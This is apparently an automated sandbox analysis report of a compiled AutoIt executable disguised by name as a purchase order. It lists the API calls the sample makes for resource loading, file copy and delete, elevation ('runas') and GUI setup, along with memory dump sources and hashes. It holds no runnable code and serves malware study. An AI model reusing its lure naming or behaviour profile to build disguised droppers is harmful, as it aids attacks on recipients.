                        • Part of subcall function 00A93598: _memset.LIBCMT ref: 00A935BE
                        • Part of subcall function 00A93598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A93667
                      Strings
                      • runas, xrefs: 00B0228B
                      • C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe, xrefs: 00A937B4, 00A937E9, 00A937FD, 00B02257
                      • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 00B021BE
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                      • String ID: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                      • API String ID: 4253510256-3107070810
                      • Opcode ID: 3e3857b69b175e6dd0c8fc6de2720d5443ed1cc23499b3f6ed0a8c7c8dff9fe3
                      • Instruction ID: a566485c35d7429f6abf8195b819dc02a4376ab642982591066834501f19de18
                      • Opcode Fuzzy Hash: 3e3857b69b175e6dd0c8fc6de2720d5443ed1cc23499b3f6ed0a8c7c8dff9fe3
                      • Instruction Fuzzy Hash: 69512676744244BACF10ABA4EC46FED3BF89B09711F0084E6FB51A31E1CE704A49CB62

                      Control-flow Graph

                      APIs
                      • GetVersionExW.KERNEL32(?), ref: 00AAE4A7
                        • Part of subcall function 00A97E53: _memmove.LIBCMT ref: 00A97EB9
                      • GetCurrentProcess.KERNEL32(00000000,00B2DC28,?,?), ref: 00AAE567
                      • GetNativeSystemInfo.KERNEL32(?,00B2DC28,?,?), ref: 00AAE5BC
                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 00AAE5C7
                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 00AAE5DA
                      • GetSystemInfo.KERNEL32(?,00B2DC28,?,?), ref: 00AAE5E4
                      • GetSystemInfo.KERNEL32(?,00B2DC28,?,?), ref: 00AAE5F0
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                      • String ID:
                      • API String ID: 2717633055-0
                      • Opcode ID: 2b2940cf4567c9bfff094bfb0432fe746eca6ec2ad956cb639f9e9cd863a0fb9
                      • Instruction ID: adb424494a03da26303f0271da61e9b37ae1aa66c16bab8215b091fe70149af0
                      • Opcode Fuzzy Hash: 2b2940cf4567c9bfff094bfb0432fe746eca6ec2ad956cb639f9e9cd863a0fb9
                      • Instruction Fuzzy Hash: F861C0B1809284DFCF16CF68A8C51E97FB5AF2A304F2945D9D8449B287D734C908CF65

                      Control-flow Graph

                      APIs
                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00A93202
                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00A93219
                      • LoadResource.KERNEL32(?,00000000), ref: 00B057D7
                      • SizeofResource.KERNEL32(?,00000000), ref: 00B057EC
                      • LockResource.KERNEL32(?), ref: 00B057FF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                      • String ID: SCRIPT
                      • API String ID: 3051347437-3967369404
                      • Opcode ID: 58f44f36edfd801804ddf2056b622bf6acecf01b4bcdc028de32d080cfb8115b
                      • Instruction ID: 6733fb2e195bf38a9c82318bede612435f4f724ffe5bde083afb078b3e0b9945
                      • Opcode Fuzzy Hash: 58f44f36edfd801804ddf2056b622bf6acecf01b4bcdc028de32d080cfb8115b
                      • Instruction Fuzzy Hash: 02115A71200701BFEB258B65EC48FA77BFAEBC9B41F208068B41287190DA71DD00CA61
                      APIs
                        • Part of subcall function 00AB010A: std::exception::exception.LIBCMT ref: 00AB013E
                        • Part of subcall function 00AB010A: __CxxThrowException@8.LIBCMT ref: 00AB0153
                      • _memmove.LIBCMT ref: 00AA2C63
                      • _memmove.LIBCMT ref: 00AA303A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _memmove$Exception@8Throwstd::exception::exception
                      • String ID: @
                      • API String ID: 1300846289-2766056989
                      • Opcode ID: e3cf76505b27cd46b72706097d42c70aac2799a3631fc7d2725edeaaea38cfe8
                      • Instruction ID: 192e61a736671b7172b1dd1dbef85c39af6bd334e42a72fca38bf16d4ac94eaf
                      • Opcode Fuzzy Hash: e3cf76505b27cd46b72706097d42c70aac2799a3631fc7d2725edeaaea38cfe8
                      • Instruction Fuzzy Hash: E1C26B75A002059FCF14DF58C980BAEBBB5FF4A300F248199E846AB391DB35EE55CB91
                      APIs
                      • GetFileAttributesW.KERNEL32(00A9C848,00A9C848), ref: 00AADDA2
                      • FindFirstFileW.KERNEL32(00A9C848,?), ref: 00B04A83
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: File$AttributesFindFirst
                      • String ID:
                      • API String ID: 4185537391-0
                      • Opcode ID: 4f445e3f1b6d2bdaebb4b1b8a813ee8a094110514edd75159fe9936bad18e66c
                      • Instruction ID: 662331164f805bbd1105fe2ee3664e180e0d4b53ed9f32450571f33eefb76f39
                      • Opcode Fuzzy Hash: 4f445e3f1b6d2bdaebb4b1b8a813ee8a094110514edd75159fe9936bad18e66c
                      • Instruction Fuzzy Hash: 59E0DF72815411BB93146738EC0D8EA3BAC9E06338B604759F976D30E0EF70AD6486DA
                      APIs
                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A9E279
                      • timeGetTime.WINMM ref: 00A9E51A
                      • TranslateMessage.USER32(?), ref: 00A9E646
                      • DispatchMessageW.USER32(?), ref: 00A9E651
                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A9E664
                      • LockWindowUpdate.USER32(00000000), ref: 00A9E697
                      • DestroyWindow.USER32 ref: 00A9E6A3
                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A9E6BD
                      • Sleep.KERNEL32(0000000A), ref: 00B05B15
                      • TranslateMessage.USER32(?), ref: 00B062AF
                      • DispatchMessageW.USER32(?), ref: 00B062BD
                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B062D1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                      • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                      • API String ID: 2641332412-570651680
                      • Opcode ID: bfaf6a1abcc529cc651892f0a177946c017b0aedbda9d0ef6296b47d29f97e8d
                      • Instruction ID: 3e2573f2b4d2309f53245c114765ee2843a2ed07c4c694aa46ef8fb1eaa602ac
                      • Opcode Fuzzy Hash: bfaf6a1abcc529cc651892f0a177946c017b0aedbda9d0ef6296b47d29f97e8d
                      • Instruction Fuzzy Hash: A362A070604341DFDB24DF24C985BAA7BE4BF45304F1449ADF94A8B2D2DB75E888CB62
                      APIs
                      • ___createFile.LIBCMT ref: 00AC6C73
                      • ___createFile.LIBCMT ref: 00AC6CB4
                      • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00AC6CDD
                      • __dosmaperr.LIBCMT ref: 00AC6CE4
                      • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00AC6CF7
                      • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00AC6D1A
                      • __dosmaperr.LIBCMT ref: 00AC6D23
                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00AC6D2C
                      • __set_osfhnd.LIBCMT ref: 00AC6D5C
                      • __lseeki64_nolock.LIBCMT ref: 00AC6DC6
                      • __close_nolock.LIBCMT ref: 00AC6DEC
                      • __chsize_nolock.LIBCMT ref: 00AC6E1C
                      • __lseeki64_nolock.LIBCMT ref: 00AC6E2E
                      • __lseeki64_nolock.LIBCMT ref: 00AC6F26
                      • __lseeki64_nolock.LIBCMT ref: 00AC6F3B
                      • __close_nolock.LIBCMT ref: 00AC6F9B
                        • Part of subcall function 00ABF84C: CloseHandle.KERNEL32(00000000,00B3EEC4,00000000,?,00AC6DF1,00B3EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00ABF89C
                        • Part of subcall function 00ABF84C: GetLastError.KERNEL32(?,00AC6DF1,00B3EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00ABF8A6
                        • Part of subcall function 00ABF84C: __free_osfhnd.LIBCMT ref: 00ABF8B3
                        • Part of subcall function 00ABF84C: __dosmaperr.LIBCMT ref: 00ABF8D5
                        • Part of subcall function 00AB889E: __getptd_noexit.LIBCMT ref: 00AB889E
                      • __lseeki64_nolock.LIBCMT ref: 00AC6FBD
                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00AC70F2
                      • ___createFile.LIBCMT ref: 00AC7111
                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00AC711E
                      • __dosmaperr.LIBCMT ref: 00AC7125
                      • __free_osfhnd.LIBCMT ref: 00AC7145
                      • __invoke_watson.LIBCMT ref: 00AC7173
                      • __wsopen_helper.LIBCMT ref: 00AC718D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                      • String ID: @
                      • API String ID: 3896587723-2766056989
                      • Opcode ID: b49a850ac14c1a732aa281a8eff4862dbdc2f386fd5a15357188930374ed8236
                      • Instruction ID: 37441f6666b841b2cada77032096c7c0ce0341c42b102c9a12712f056e3da0b5
                      • Opcode Fuzzy Hash: b49a850ac14c1a732aa281a8eff4862dbdc2f386fd5a15357188930374ed8236
                      • Instruction Fuzzy Hash: 082203719042059BEB25DF68DC51FED7B75EF04320F2A426DE921AB2E2C7398D50CB51

                      Control-flow Graph

                      APIs
                      • _wcscpy.LIBCMT ref: 00AE026A
                      • _wcschr.LIBCMT ref: 00AE0278
                      • _wcscpy.LIBCMT ref: 00AE028F
                      • _wcscat.LIBCMT ref: 00AE029E
                      • _wcscat.LIBCMT ref: 00AE02BC
                      • _wcscpy.LIBCMT ref: 00AE02DD
                      • __wsplitpath.LIBCMT ref: 00AE03BA
                      • _wcscpy.LIBCMT ref: 00AE03DF
                      • _wcscpy.LIBCMT ref: 00AE03F1
                      • _wcscpy.LIBCMT ref: 00AE0406
                      • _wcscat.LIBCMT ref: 00AE041B
                      • _wcscat.LIBCMT ref: 00AE042D
                      • _wcscat.LIBCMT ref: 00AE0442
                        • Part of subcall function 00ADC890: _wcscmp.LIBCMT ref: 00ADC92A
                        • Part of subcall function 00ADC890: __wsplitpath.LIBCMT ref: 00ADC96F
                        • Part of subcall function 00ADC890: _wcscpy.LIBCMT ref: 00ADC982
                        • Part of subcall function 00ADC890: _wcscat.LIBCMT ref: 00ADC995
                        • Part of subcall function 00ADC890: __wsplitpath.LIBCMT ref: 00ADC9BA
                        • Part of subcall function 00ADC890: _wcscat.LIBCMT ref: 00ADC9D0
                        • Part of subcall function 00ADC890: _wcscat.LIBCMT ref: 00ADC9E3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                      • String ID: >>>AUTOIT SCRIPT<<<
                      • API String ID: 2955681530-2806939583
                      • Opcode ID: 4de8a723fa2808a3eac8941082a8442784f8a649a53b2e03e81db9f2d18a7b6d
                      • Instruction ID: b251fcbd2f682ec6fc6c3248634712cb1102f05158f4640a72d0b74bed4e6eee
                      • Opcode Fuzzy Hash: 4de8a723fa2808a3eac8941082a8442784f8a649a53b2e03e81db9f2d18a7b6d
                      • Instruction Fuzzy Hash: 4491B671604741AFCB24EB64CA55F9FB3E8AF84310F04485DF5499B292EB74EA84CB92

                      Control-flow Graph

                      APIs
                      • GetSysColorBrush.USER32(0000000F), ref: 00A92F8B
                      • RegisterClassExW.USER32(00000030), ref: 00A92FB5
                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A92FC6
                      • InitCommonControlsEx.COMCTL32(?), ref: 00A92FE3
                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A92FF3
                      • LoadIconW.USER32(000000A9), ref: 00A93009
                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A93018
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated$3o
                      • API String ID: 2914291525-1794097289
                      • Opcode ID: 9caac2435c4449da80fd44e653dc33e2502d41facbff9b741d1fecea51e63188
                      • Instruction ID: 584789cb2ae79e073c8e87f28fc1e0f9257b5eb674b0cd9772254fc63eed773b
                      • Opcode Fuzzy Hash: 9caac2435c4449da80fd44e653dc33e2502d41facbff9b741d1fecea51e63188
                      • Instruction Fuzzy Hash: F021C4B5900318AFDB10DFA8E849BCEBBF4FB08701F50895AF615A72A0DBB44544CF91

                      Control-flow Graph

                      APIs
                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe,00000104,?,00000000,00000001,00000000), ref: 00A9428C
                        • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                        • Part of subcall function 00AB1BC7: __wcsicmp_l.LIBCMT ref: 00AB1C50
                      • _wcscpy.LIBCMT ref: 00A943C0
                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 00B0214E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe$CMDLINE$CMDLINERAW
                      • API String ID: 861526374-2055046804
                      • Opcode ID: cc928510e0b26833b58018f95e1247e425c3324d40914738bfb1b3672eb32f33
                      • Instruction ID: 7ab24024dc9d33e4375585f4804edb2d9f92ac287a237e5488fe03c995ba4aab
                      • Opcode Fuzzy Hash: cc928510e0b26833b58018f95e1247e425c3324d40914738bfb1b3672eb32f33
                      • Instruction Fuzzy Hash: 01819072A00219AACF05EBE4DE56FEFBBF8AF45350F500455E501B7091EF606A09CBA1

                      Control-flow Graph

                      APIs
                        • Part of subcall function 00ADC6A0: __time64.LIBCMT ref: 00ADC6AA
                        • Part of subcall function 00A941A7: _fseek.LIBCMT ref: 00A941BF
                      • __wsplitpath.LIBCMT ref: 00ADC96F
                        • Part of subcall function 00AB297D: __wsplitpath_helper.LIBCMT ref: 00AB29BD
                      • _wcscpy.LIBCMT ref: 00ADC982
                      • _wcscat.LIBCMT ref: 00ADC995
                      • __wsplitpath.LIBCMT ref: 00ADC9BA
                      • _wcscat.LIBCMT ref: 00ADC9D0
                      • _wcscat.LIBCMT ref: 00ADC9E3
                        • Part of subcall function 00ADC6E4: _memmove.LIBCMT ref: 00ADC71D
                        • Part of subcall function 00ADC6E4: _memmove.LIBCMT ref: 00ADC72C
                      • _wcscmp.LIBCMT ref: 00ADC92A
                        • Part of subcall function 00ADCE59: _wcscmp.LIBCMT ref: 00ADCF49
                        • Part of subcall function 00ADCE59: _wcscmp.LIBCMT ref: 00ADCF5C
                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00ADCB8D
                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00ADCC24
                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00ADCC3A
                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00ADCC4B
                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00ADCC5D
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                      • String ID:
                      • API String ID: 152968663-0
                      • Opcode ID: 357c0c811362da70994024e255b623f50b2dc5f1c96894e7e646ced2ccf9ca79
                      • Instruction ID: 1e75282781049a24de0ec1ed4eaaf98ec508ebbb2d04b3c2e4c461187aa3c42f
                      • Opcode Fuzzy Hash: 357c0c811362da70994024e255b623f50b2dc5f1c96894e7e646ced2ccf9ca79
                      • Instruction Fuzzy Hash: BCC13DB1A00129AECF10DFA5CD81EDEB7BDEF49310F5041AAF609E6251DB709A85CF61

                      Control-flow Graph

                      APIs
                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00AAEA39
                      • __wsplitpath.LIBCMT ref: 00AAEA56
                        • Part of subcall function 00AB297D: __wsplitpath_helper.LIBCMT ref: 00AB29BD
                      • _wcsncat.LIBCMT ref: 00AAEA69
                      • __makepath.LIBCMT ref: 00AAEA85
                        • Part of subcall function 00AB2BFF: __wmakepath_s.LIBCMT ref: 00AB2C13
                        • Part of subcall function 00AB010A: std::exception::exception.LIBCMT ref: 00AB013E
                        • Part of subcall function 00AB010A: __CxxThrowException@8.LIBCMT ref: 00AB0153
                      • _wcscpy.LIBCMT ref: 00AAEABE
                        • Part of subcall function 00AAEB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00AAEADA,?,?), ref: 00AAEB27
                      • _wcscat.LIBCMT ref: 00B032FC
                      • _wcscat.LIBCMT ref: 00B03334
                      • _wcsncpy.LIBCMT ref: 00B03370
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                      • String ID: Include$\
                      • API String ID: 1213536620-3429789819
                      • Opcode ID: 646d47f07a3bac52cc14eb5ec40f6f1073ad19e77e4f8b52290d7e14aedda659
                      • Instruction ID: df9b942c7c492a041602e724515807a1907081cb154c5bbd5e1bf1aaf36cb102
                      • Opcode Fuzzy Hash: 646d47f07a3bac52cc14eb5ec40f6f1073ad19e77e4f8b52290d7e14aedda659
                      • Instruction Fuzzy Hash: 97518FB24063409FC305EF68ED85E97B7ECFB4A301B40499EF54587261EF749644CB6A

                      Control-flow Graph

                      APIs
                      • DefWindowProcW.USER32(?,?,?,?), ref: 00A92A33
                      • KillTimer.USER32(?,00000001), ref: 00A92A5D
                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A92A80
                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A92A8B
                      • CreatePopupMenu.USER32 ref: 00A92A9F
                      • PostQuitMessage.USER32(00000000), ref: 00A92AAE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                      • String ID: TaskbarCreated
                      • API String ID: 129472671-2362178303
                      • Opcode ID: 2fd02f92c4478d9901d0924a2da68aaf474c7c9d947f3a4c07f71a51ece7fd2c
                      • Instruction ID: 97c1d5fa8d94d8e8cc1188287e86081fcae9c023495aa2ceca9a17869970faa0
                      • Opcode Fuzzy Hash: 2fd02f92c4478d9901d0924a2da68aaf474c7c9d947f3a4c07f71a51ece7fd2c
                      • Instruction Fuzzy Hash: A8415433300245BFDF34AF689D0DBBA36EAE714381F444AA6F902979E1DE749C448765

                      Control-flow Graph

                      APIs
